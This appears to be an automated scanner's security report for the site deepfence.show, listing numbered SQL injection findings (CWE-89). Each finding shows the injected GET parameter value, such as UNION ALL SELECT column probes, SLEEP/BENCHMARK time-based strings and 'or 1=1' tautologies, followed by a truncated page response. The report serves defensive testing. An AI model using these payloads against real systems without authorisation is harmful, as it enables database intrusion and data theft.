href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1590\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> \n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbW\nFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIo\nqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints\non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1591\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1592\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1593\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1594\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1595\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1596\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1597\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=x--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1598\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1599\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1600\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1601\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1602\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1603\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 